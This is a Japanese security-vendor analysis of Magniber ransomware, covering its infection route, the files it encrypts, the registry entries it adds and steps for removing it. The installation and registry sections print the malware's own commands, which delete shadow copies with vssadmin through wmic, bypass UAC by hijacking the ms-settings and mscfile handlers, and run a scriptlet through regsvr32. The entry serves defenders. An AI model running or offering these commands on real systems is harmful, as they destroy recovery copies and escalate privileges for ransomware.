解析者: Khristian Joseph Morales   

 別名:

Ransom:Win64/Magniber.!MTB (MICROSOFT)

 プラットフォーム:

Windows

 危険度:
 ダメージ度:
 感染力:
 感染確認数:
 情報漏えい:

  • マルウェアタイプ:
    身代金要求型不正プログラム(ランサムウェア)

  • 破壊活動の有無:
    なし

  • 暗号化:
    はい

  • 感染報告の有無 :
    はい

  概要

感染経路 インターネットからのダウンロード, 他のマルウェアからの作成

マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。

マルウェアは、ワーム活動の機能を備えていません。

マルウェアは、バックドア活動の機能を備えていません。

マルウェアは、感染コンピュータ上の特定の情報を収集します。

マルウェアは、特定のWebサイトに誘導します。 ただし、情報公開日現在、このWebサイトにはアクセスできません。

身代金要求文書のファイルを作成します。

  詳細

ファイルサイズ 39,424 bytes
タイプ DLL
メモリ常駐 はい
発見日 2021年11月1日
ペイロード URLまたはIPアドレスに接続, ファイルの作成, ファイルの暗号化, メッセージボックスの表示

侵入方法

マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。

インストール

マルウェアは、以下のプロセスを追加します。

  • Display ransom note:
    • notepad.exe %Public%\readme.txt
  • Open payment page through browser:
    • cmd /c "start http://{Random characters}kynscshsn.{BLOCKED}s.uno/kynscshsn&{string1}&{string2}&{string3}&{string4}&{string5} "
      • where
        • string1
          • The number of drives in which the ransomware has enumerated files
        • string2
          • Total size of encrypted data has generated in bytes
        • string3
          • The number of files it encrypts
        • string4
          • The number of file it enumerates
        • string5
          • The build number of the comprimised windows OS
  • %System%\wbem\wmic process call create "vssadmin. exe Delete Shadows /all /quiet" → deletes shadow copies
  • cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"" → If running on Win10
  • cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"" → if running on Windows versions < Win10

マルウェアは、以下のプロセスに自身を組み込み、システムのプロセスに常駐します。

  • It injects into each process if the ff. criteria is met:
    • The process is not iexplore.exe

マルウェアは、以下の Mutex を作成し、メモリ上で自身の重複実行を避けます。

  • kynscshsn

他のシステム変更

マルウェアは、以下のレジストリ値を追加します。

if running on Win10:
HKEY_CURRENT_USER\Software\Classes\
ms-settings\shell\open\
command
(Default) = regsvr32.exe scrobj.dll /s /u /n /i:%Public%\readme.txt → initial registry entry where file originally contains code to delete shadow files

HKEY_CURRENT_USER\Software\Classes\
ms-settings\shell\open\
command
(Default) = %System%\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

HKEY_CURRENT_USER\Software\Classes\
ms-settings\shell\open\
command
DelegateExecute = 0

if running on Windows versions < Win10:
HKEY_CURRENT_USER\Software\Classes\
mscfile\shell\open\
command
(Default) = %System%\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

感染活動

マルウェアは、ワーム活動の機能を備えていません。

バックドア活動

マルウェアは、バックドア活動の機能を備えていません。

ルートキット機能

マルウェアは、ルートキット機能を備えていません。

情報漏えい

マルウェアは、感染コンピュータ上の以下の情報を収集します。

  • The number of drives it enumerates
  • Total size of encrypted data
  • The number of encrypted files
  • The number of enumerated files
  • Build number of the compromised windows operating system

その他

マルウェアは、以下の拡張子をもつファイルを暗号化します。

  • abm
  • abs
  • abw
  • accdb
  • act
  • adn
  • adp
  • aes
  • aft
  • afx
  • agif
  • agp
  • ahd
  • ai
  • aic
  • aim
  • albm
  • alf
  • ans
  • apd
  • apm
  • apng
  • aps
  • apt
  • apx
  • arc
  • art
  • arw
  • asc
  • ase
  • asf
  • ask
  • asm
  • asp
  • asw
  • asy
  • aty
  • avi
  • awdb
  • awp
  • awt
  • aww
  • azz
  • bad
  • bak
  • bay
  • bbs
  • bdb
  • bdp
  • bdr
  • bean
  • bib
  • bmp
  • bmx
  • bna
  • bnd
  • boc
  • bok
  • brd
  • brk
  • brn
  • brt
  • bss
  • btd
  • bti
  • btr
  • c
  • ca
  • cals
  • can
  • cd
  • cdb
  • cdc
  • cdg
  • cdmm
  • cdmt
  • cdmz
  • cdr
  • cdt
  • cf
  • cfu
  • cgm
  • cimg
  • cin
  • cit
  • ckp
  • class
  • clkw
  • cma
  • cmx
  • cnm
  • cnv
  • colz
  • cpc
  • cpd
  • cpg
  • cpp
  • cps
  • cpx
  • crd
  • crt
  • crw
  • cs
  • csr
  • csv
  • csy
  • ct
  • cvg
  • cvi
  • cvs
  • cvx
  • cwt
  • cxf
  • cyi
  • dad
  • daf
  • db
  • dbc
  • dbf
  • dbk
  • dbs
  • dbt
  • dbv
  • dbx
  • dca
  • dcb
  • dch
  • dcr
  • dcs
  • dct
  • dcx
  • dd
  • dds
  • ded
  • der
  • dgn
  • dgs
  • dgt
  • dhs
  • dib
  • dif
  • dip
  • diz
  • djv
  • djvu
  • dmi
  • dmo
  • dnc
  • dne
  • doc
  • docb
  • docm
  • docx
  • docz
  • dot
  • dotm
  • dotx
  • dpp
  • dpx
  • dqy
  • drw
  • drz
  • dsk
  • dsn
  • dsv
  • dt
  • dta
  • dtsx
  • dtw
  • dv
  • dvi
  • dwg
  • dx
  • dxb
  • dxf
  • eco
  • ecw
  • ecx
  • edb
  • efd
  • egc
  • eio
  • eip
  • eit
  • em
  • emd
  • emf
  • emlx
  • ep
  • epf
  • epp
  • eps
  • epsf
  • eq
  • erf
  • err
  • etf
  • etx
  • euc
  • exr
  • fa
  • faq
  • fax
  • fb
  • fbx
  • fcd
  • fcf
  • fdf
  • fdr
  • fds
  • fdt
  • fdx
  • fdxt
  • fes
  • fft
  • fi
  • fic
  • fid
  • fif
  • fig
  • fla
  • flr
  • flv
  • fmv
  • fo
  • fodt
  • fpos
  • fpt
  • fpx
  • frm
  • frt
  • frx
  • ftn
  • fwdn
  • fxc
  • fxg
  • fzb
  • fzv
  • gcdp
  • gdb
  • gdoc
  • gem
  • geo
  • gfb
  • gfie
  • ggr
  • gif
  • gih
  • gim
  • gio
  • glox
  • gpd
  • gpg
  • gpn
  • gro
  • grob
  • grs
  • gsd
  • gthr
  • gtp
  • gv
  • gwi
  • gz
  • h
  • hbk
  • hdb
  • hdp
  • hdr
  • hht
  • his
  • hp
  • hpg
  • hpi
  • hs
  • htc
  • hwp
  • hz
  • ib
  • ibd
  • icn
  • icon
  • icpr
  • idc
  • idea
  • idx
  • igt
  • igx
  • ihx
  • ii
  • iiq
  • imd
  • info
  • ink
  • ipf
  • ipx
  • iso
  • itdb
  • itw
  • iwi
  • j
  • jar
  • jas
  • java
  • jbig
  • jbmp
  • jbr
  • jfif
  • jia
  • jis
  • jng
  • joe
  • jpe
  • jpeg
  • jpg
  • jps
  • jpx
  • jrtf
  • js
  • jsp
  • jtf
  • jtx
  • jw
  • jxr
  • kdb
  • kdbx
  • kdc
  • kdi
  • kdk
  • kes
  • key
  • kic
  • klg
  • knt
  • kon
  • kpg
  • kwd
  • lay
  • lbm
  • lbt
  • ldf
  • lgc
  • lis
  • lit
  • ljp
  • lmk
  • lnt
  • lrc
  • lst
  • ltr
  • ltx
  • lue
  • luf
  • lwo
  • lwp
  • lws
  • lyt
  • lyx
  • ma
  • mac
  • man
  • map
  • maq
  • mat
  • max
  • mb
  • mbm
  • mbox
  • mdb
  • mdf
  • mdn
  • mdt
  • me
  • mef
  • mel
  • mft
  • mgcb
  • mgmf
  • mgmt
  • mgmx
  • mgtx
  • mid
  • min
  • mkv
  • mm
  • mmat
  • mnr
  • mnt
  • mos
  • mov
  • mpeg
  • mpf
  • mpg
  • mpo
  • mrg
  • mrxs
  • msg
  • mud
  • mwb
  • mwp
  • mx
  • my
  • myd
  • myi
  • ncr
  • nct
  • ndf
  • nef
  • nfo
  • njx
  • nlm
  • now
  • nrw
  • nsf
  • nyf
  • nzb
  • obj
  • oce
  • oci
  • ocr
  • odb
  • odg
  • odm
  • odo
  • odp
  • ods
  • odt
  • of
  • oft
  • omf
  • oplc
  • oqy
  • ora
  • orf
  • ort
  • orx
  • ost
  • ota
  • otg
  • oti
  • otp
  • ots
  • ott
  • ovp
  • ovr
  • owc
  • owg
  • oyx
  • ozb
  • ozj
  • ozt
  • p
  • pa
  • pan
  • pano
  • pap
  • paq
  • pas
  • pbm
  • pcd
  • pcs
  • pdb
  • pdd
  • pdf
  • pdm
  • pds
  • pdt
  • pef
  • pem
  • pff
  • pfi
  • pfs
  • pfv
  • pfx
  • pgf
  • pgm
  • phm
  • php
  • pic
  • pict
  • pix
  • pjpg
  • pjt
  • plt
  • pm
  • pmg
  • png
  • pni
  • pnm
  • pntg
  • pnz
  • pobj
  • pop
  • pot
  • potm
  • potx
  • ppam
  • ppm
  • pps
  • ppsm
  • ppsx
  • ppt
  • pptm
  • pptx
  • prt
  • prw
  • psd
  • psdx
  • pse
  • psid
  • psp
  • pst
  • psw
  • ptg
  • pth
  • ptx
  • pu
  • pvj
  • pvm
  • pvr
  • pwa
  • pwi
  • pwr
  • px
  • pxr
  • pza
  • pzp
  • pzs
  • qd
  • qmg
  • qpx
  • qry
  • qvd
  • rad
  • rar
  • ras
  • raw
  • rb
  • rctd
  • rcu
  • rd
  • rdb
  • rft
  • rgb
  • rgf
  • rib
  • ric
  • riff
  • ris
  • rix
  • rle
  • rli
  • rng
  • rpd
  • rpf
  • rpt
  • rri
  • rs
  • rsb
  • rsd
  • rsr
  • rst
  • rt
  • rtd
  • rtf
  • rtx
  • run
  • rw
  • rzk
  • rzn
  • saf
  • sam
  • sbf
  • scad
  • scc
  • sch
  • sci
  • scm
  • sct
  • scv
  • scw
  • sdb
  • sdf
  • sdm
  • sdoc
  • sdw
  • sep
  • sfc
  • sfw
  • sgm
  • sh
  • sig
  • skm
  • sla
  • sld
  • sldm
  • sldx
  • slk
  • sln
  • sls
  • smf
  • sms
  • snt
  • sob
  • spa
  • spe
  • sph
  • spj
  • spp
  • spq
  • spr
  • sq
  • sqb
  • srw
  • ssa
  • ssk
  • st
  • stc
  • std
  • sti
  • stm
  • stn
  • stp
  • str
  • stw
  • sty
  • sub
  • suo
  • svf
  • svg
  • svgz
  • swf
  • sxc
  • sxd
  • sxg
  • sxi
  • sxm
  • sxw
  • tab
  • tar
  • tbk
  • tcx
  • tdf
  • tdt
  • te
  • tex
  • text
  • tgz
  • thp
  • tif
  • tiff
  • tlb
  • tlc
  • tm
  • tmd
  • tmv
  • tmx
  • tne
  • tpc
  • trm
  • tvj
  • udb
  • ufr
  • unx
  • uof
  • uop
  • uot
  • upd
  • usr
  • utxt
  • vb
  • vbr
  • vbs
  • vcd
  • vct
  • vdb
  • vdi
  • vec
  • vm
  • vmdk
  • vmx
  • vnt
  • vob
  • vpd
  • vrm
  • vrp
  • vsd
  • vsdm
  • vsdx
  • vsm
  • vstm
  • vstx
  • vue
  • vw
  • wav
  • wbk
  • wcf
  • wdb
  • wgz
  • wire
  • wks
  • wma
  • wmdb
  • wmv
  • wn
  • wp
  • wpa
  • wpd
  • wpg
  • wps
  • wpt
  • wpw
  • wri
  • wsc
  • wsd
  • wsh
  • wtx
  • x
  • xar
  • xd
  • xdb
  • xlc
  • xld
  • xlf
  • xlgc
  • xlm
  • xls
  • xlsb
  • xlsm
  • xlsx
  • xlt
  • xltm
  • xltx
  • xlw
  • xps
  • xwp
  • xyp
  • xyw
  • ya
  • ybk
  • ym
  • zabw
  • zdb
  • zdc
  • zip
  • zw

マルウェアは、以下のWebサイトに誘導します。

  • http://{Random characters}kynscshsn.{BLOCKED}s.uno/kynscshsn&{string1}&{string2}&{string3}&{string4}&{string5} → connects to payment page

ただし、情報公開日現在、このWebサイトにはアクセスできません。

マルウェアは、脆弱性を利用した感染活動を行いません。

ランサムウェアの不正活動

マルウェアは、以下のフォルダ内で確認されたファイルの暗号化はしません。

  • documents and settings
  • appdata
  • local settings
  • sample music
  • sample pictures
  • sample videos
  • tor browser
  • recycle
  • windows
  • boot
  • intel
  • msocache
  • perflogs
  • program files
  • programdata
  • recovery
  • system volume information
  • winnt

マルウェアは、暗号化されたファイルのファイル名に以下の拡張子を追加します。

  • .kynscshsn

マルウェアが作成する以下のファイルは、脅迫状です。

  • %Public%\readme.txt
  • {Encrypted Directory}\readme.txt

<補足>
インストール

マルウェアは、以下のプロセスを追加します。

  • ランサムノート(脅迫状)を表示する
    • notepad.exe %Public%\readme.txt
  • ブラウザで支払いページを開く
    • cmd /c "start http://{ランダムな文字}kynscshsn.{BLOCKED}s.uno/kynscshsn&{文字列1}&{文字列2}&{文字列3}&{文字列4}&{文字列5} "
      • 上記の文字列は以下
        • 文字列1:ランサムウェアがファイルを列挙したドライブの数
        • 文字列2:暗号化されたデータの合計サイズ、単位:バイトで生成されたもの
        • 文字列3:暗号化されたファイルの数
        • 文字列4:列挙したファイルの数
        • 文字列5:感染したWindows OS のビルド番号
  • %System%\wbem\wmic process call create "vssadmin. exe Delete Shadows /all /quiet" → シャドウコピーを削除する
  • cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"" → Windows 10で実行されている場合
  • cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"" → Windows 10以前のバージョンで実行されている場合

マルウェアは、以下の条件を満たす場合、感染システムのメモリ内で実行されている各プロセスに自身を注入します。

  • プロセスがiexplore.exeではない場合

情報漏えい

マルウェアは、感染コンピュータ上の以下の情報を収集します。

  • 列挙したドライブの数
  • 暗号化したデータの合計サイズ
  • 暗号化したファイルの数
  • 列挙したファイルの数
  • 感染したWindowsオペレーティングシステム(OS)のビルド番号

その他

マルウェアは、以下のWebサイトに誘導します。

  • http://{ランダムな文字}kynscshsn.{BLOCKED}s.uno/kynscshsn&{文字列1}&{文字列2}&{文字列3}&{文字列4}&{文字列5} → 支払いページへ接続する

マルウェアは、以下の利用可能なドライブを暗号化します。

  • リムーバブルドライブ
  • リモートドライブ
  • 固定ドライブ

マルウェアは、以下のァイル属性を持つファイルを暗号化することを避けます。

  • FILE_ATTRIBUTE_SYSTEM
  • FILE_ATTRIBUTE_HIDDEN
  • FILE_ATTRIBUTE_READYONLY
  • FILE_ATTRIBUTE_TEMPORARY
  • FILE_ATTRIBUTE_VIRTUAL

マルウェアは、以下のァイル属性を持つフォルダを暗号化することを避けます。

  • FILE_ATTRIBUTE_SYSTEM
  • FILE_ATTRIBUTE_HIDDEN
  • FILE_ATTRIBUTE_ENCRYPTED

  対応方法

対応検索エンジン: 9.800
初回 VSAPI パターンバージョン 17.186.03
初回 VSAPI パターンリリース日 2021年11月11日
VSAPI OPR パターンバージョン 17.187.00
VSAPI OPR パターンリリース日 2021年11月12日

手順 1

Windows 7、Windows 8、Windows 8.1、および Windows 10 のユーザは、コンピュータからマルウェアもしくはアドウェア等を完全に削除するために、ウイルス検索の実行前には必ず「システムの復元」を無効にしてください。

手順 2

このマルウェアもしくはアドウェア等の実行により、手順中に記載されたすべてのファイル、フォルダおよびレジストリキーや値がコンピュータにインストールされるとは限りません。インストールが不完全である場合の他、オペレーティングシステム(OS)の条件によりインストールがされない場合が考えられます。手順中に記載されたファイル/フォルダ/レジストリ情報が確認されない場合、該当の手順の操作は不要ですので、次の手順に進んでください。

手順 3

「Ransom.Win64.MAGNIBER.C」で検出したファイル名を確認し、そのファイルを終了します。

[ 詳細 ]

  • すべての実行中プロセスが、Windows のタスクマネージャに表示されない場合があります。この場合、"Process Explorer" などのツールを使用しマルウェアのファイルを終了してください。"Process Explorer" については、こちらをご参照下さい。
  • 検出ファイルが、Windows のタスクマネージャまたは "Process Explorer" に表示されるものの、削除できない場合があります。この場合、コンピュータをセーフモードで再起動してください。
    セーフモードについては、こちらをご参照下さい。
  • 検出ファイルがタスクマネージャ上で表示されない場合、次の手順にお進みください。

手順 4

このレジストリ値を削除します。

[ 詳細 ]

警告:レジストリはWindowsの構成情報が格納されているデータベースであり、レジストリの編集内容に問題があると、システムが正常に動作しなくなる場合があります。
レジストリの編集はお客様の責任で行っていただくようお願いいたします。弊社ではレジストリの編集による如何なる問題に対しても補償いたしかねます。
レジストリの編集前にこちらをご参照ください。

  • In HKEY_CURRENT_USER\Software\Classes\ms-settings\shell\open\command
    • (Default) = regsvr32.exe scrobj.dll /s /u /n /i:%Public%\readme.txt
  • In HKEY_CURRENT_USER\Software\Classes\ms-settings\shell\open\command
    • (Default) = %System%\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  • In HKEY_CURRENT_USER\Software\Classes\ms-settings\shell\open\command
    • DelegateExecute = 0
  • In HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command
    • (Default) = %System%\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

手順 5

以下のファイルを検索し削除します。

[ 詳細 ]
コンポーネントファイルが隠しファイル属性の場合があります。[詳細設定オプション]をクリックし、[隠しファイルとフォルダの検索]のチェックボックスをオンにし、検索結果に隠しファイルとフォルダが含まれるようにしてください。
  • %Public%\readme.txt
  • {Encrypted Directory}\readme.txt

手順 6

最新のバージョン(エンジン、パターンファイル)を導入したウイルス対策製品を用い、ウイルス検索を実行してください。「Ransom.Win64.MAGNIBER.C」と検出したファイルはすべて削除してください。 検出されたファイルが、弊社ウイルス対策製品により既に駆除、隔離またはファイル削除の処理が実行された場合、ウイルスの処理は完了しており、他の削除手順は特にありません。

手順 7

暗号化されたファイルをバックアップから復元します。


ご利用はいかがでしたか? アンケートにご協力ください